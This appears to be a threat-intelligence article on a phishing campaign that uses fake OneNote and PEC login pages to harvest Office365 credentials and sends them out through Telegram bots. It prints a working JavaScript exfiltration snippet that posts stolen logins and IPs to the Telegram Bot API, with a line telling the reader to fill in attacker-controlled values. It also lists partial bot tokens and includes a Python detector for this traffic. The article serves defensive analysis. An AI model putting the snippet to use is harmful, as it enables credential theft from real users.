Hackers Use Fake OneNote Login to Capture Office365 and Outlook Credentials

A recent investigation by security analysts has uncovered a persistent phishing campaign targeting Italian and U.S. users, utilizing a chain of free cloud platforms and Telegram bots for credential harvesting and data exfiltration.

The attack typically begins with a phishing page hosted on services like Notion or Google Docs, masquerading as legitimate portals such as Microsoft OneNote or Italy’s PEC (Posta Elettronica Certificata) email system.

Victims are lured via email into clicking a link that leads to a fake login page, where they are prompted to enter their credentials.

Upon submission, the phishing script collects not only the entered credentials but also the victim’s IP address, often using the ipify.org service.

The stolen data is then exfiltrated through the Telegram Bot API, with bot tokens and chat IDs hardcoded into the malicious JavaScript.

After the data is sent, users are redirected to the genuine Microsoft login page, maintaining the illusion of legitimacy.

Technical Exfiltration Code Example:

```javascript
// Capture victim's IP address
fetch('https://api.ipify.org?format=json')
  .then(response => response.json())
  .then(data => {
    let ip = data.ip;
    // login and password hold the values typed into the fake form's fields
    let message = `Login: ${login}\nPassword: ${password}\nIP: ${ip}`;
    // Exfiltrate via Telegram bot
    fetch(`https://api.telegram.org/bot<BOT_TOKEN>/sendMessage?chat_id=<CHAT_ID>&text=${encodeURIComponent(message)}`);
  });
```

Replace `<BOT_TOKEN>` and `<CHAT_ID>` with attacker-controlled values.

Evolution and Patterns in Phishing Techniques

Analysis of multiple samples reveals that while the phishing themes and visual layouts have varied—sometimes mimicking OneNote, other times PEC—the underlying exfiltration mechanism has remained consistent.

Early variants used simple form submissions for data theft, but by February 2022, attackers had standardized on Telegram bot-based exfiltration, occasionally adding obfuscation through nested URL encoding or Base64, though these techniques were later abandoned.

The campaign’s infrastructure is characterized by:

  • Use of free or low-cost cloud services (Notion, Glitch, Google Docs, RenderForest) for hosting phishing content.
  • Minimal evasion techniques, with only basic obfuscation and no advanced anti-detection measures.
  • Reliance on Telegram bots as off-the-shelf command-and-control (C2) infrastructure.

Table: Evolution of Phishing Mechanisms

| Date Range | Hosting Chain | Exfiltration Method | Notable Changes |
|---|---|---|---|
| Jan 29, 2022 | Notion + Glitch | Form submission | URL encoding, no Telegram |
| Feb 2, 2022 | Notion + Glitch | Telegram bot | Nested URL encoding |
| Aug 23, 2023 | Notion + Glitch | Telegram bot | Added IP address collection |
| Jul–Dec 2024 | Google Docs + Backblaze | Telegram bot (Base64) | Experimented with Base64 obfuscation |
| Apr 7, 2025 | Notion + Glitch | Telegram bot | Current, streamlined, no obfuscation |

Profiling the Threat Actor and Detection Strategies

The threat actor behind this campaign appears to lack advanced technical skills, favoring simplicity and scalability over sophistication.

The campaign is low-volume but persistent, with evidence suggesting a focus on access brokering—selling harvested credentials to other cybercriminals—rather than direct exploitation.

Key Technical Indicators:

  • Hardcoded Telegram bot tokens and chat IDs in phishing scripts.
  • Behavioral pattern: Notion → Glitch → Telegram API.
  • Use of the Italian language and targeting of Italian business domains.

Sample Telegram Bot Tokens and Chat IDs:

| Bot Name | Username | Token (partial) | Chat ID |
|---|---|---|---|
| Sultanna | @Sultannanewbot | 7547274214:AAE2…J4wL9sE | 6475928726 |
| remaxx24 | @remaxx24bot | 7072331661:AAEn…GrnTZY | 5308217415 |
| Resultant | @Resultantnewbot | 6741707974:AAHG…HNvQ_E | 6475928726 |

Detection Recommendations:

  • Monitor for network traffic to Telegram Bot API domains, especially in conjunction with access to Notion or Glitch-hosted pages.
  • Implement signature-based detection for hardcoded Telegram bot tokens in web traffic.
  • Track domain chains and page titles indicative of phishing (e.g., “One Note | Microsoft”, “Aruba | PEC”).
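As an added illustration of the three recommendations above (example code written for this article, not part of the original report or of any vendor product), the following Python correlates proxy log lines so that a Telegram Bot API `sendMessage` call is rated higher when the same client visited a Notion, Glitch or ipify host shortly before it, and also applies a signature check for hardcoded bot tokens in a script body. The log format, the ten-minute window and the token shape (numeric bot id, colon, 30+ character secret) are assumptions; the sample log and token are constructed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Assumed token shape: <numeric bot id>:<30+ char secret>. Tune if your samples differ.
TOKEN_RE = re.compile(r"\d{8,12}:[A-Za-z0-9_-]{30,}")
BOT_CALL_RE = re.compile(r"https?://api\.telegram\.org/bot(?P<token>" + TOKEN_RE.pattern + r")/sendMessage")
# Hosts that precede the Telegram call in the chain described in the article.
STAGING_HOSTS = ("notion.site", "notion.so", "glitch.me", "api.ipify.org")
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed proxy log, "<ISO time> <client> <method> <url> <status>" (not real traffic).
SAMPLE_LOG = """\
2025-04-07T09:12:01Z 10.0.0.5 GET https://team-portal.notion.site/One-Note 200
2025-04-07T09:12:09Z 10.0.0.5 GET https://login-helper.glitch.me/app.js 200
2025-04-07T09:12:40Z 10.0.0.5 GET https://api.ipify.org/?format=json 200
2025-04-07T09:12:41Z 10.0.0.5 GET https://api.telegram.org/bot1234567890:AAExampleTokenCONSTRUCTED0000000000/sendMessage?chat_id=111&text=x 200
2025-04-07T10:30:00Z 10.0.0.7 GET https://api.telegram.org/bot1234567890:AAExampleTokenCONSTRUCTED0000000000/sendMessage?chat_id=111&text=y 200
2025-04-07T10:31:00Z 10.0.0.9 GET https://www.microsoft.com/ 200
"""

def parse_line(line):
    ts, client, _method, url, _status = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client, "url": url}

def staging_host(url):
    """Return the matching staging-host suffix for a URL, or None."""
    host = urlsplit(url).hostname or ""
    return next((h for h in STAGING_HOSTS if host == h or host.endswith("." + h)), None)

def find_telegram_exfil(log_text):
    """One finding per Telegram sendMessage call; 'high' severity when the same client
    touched a staging host within WINDOW before the call, otherwise 'medium'."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    findings = []
    for ev in events:
        m = BOT_CALL_RE.search(ev["url"])
        if not m:
            continue
        prior = {staging_host(e["url"]) for e in events
                 if e["client"] == ev["client"] and ev["ts"] - WINDOW <= e["ts"] < ev["ts"]}
        prior.discard(None)
        findings.append({"client": ev["client"],
                         "bot_id": m.group("token").split(":", 1)[0],
                         "staging_hosts": sorted(prior),
                         "severity": "high" if prior else "medium"})
    return findings

def tokens_in_script(body):
    """Signature check: hardcoded bot tokens inside a fetched script body."""
    return sorted(set(TOKEN_RE.findall(body)))
```

Feeding real proxy exports through `find_telegram_exfil` gives a per-client verdict; `tokens_in_script` can be run over JavaScript bodies served from the staging hosts to extract the token for blocking and reporting.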

This campaign highlights the ongoing evolution of phishing operations, where attackers leverage easily accessible cloud infrastructure and messaging APIs for credential theft, underscoring the need for vigilant monitoring and adaptive defense strategies.
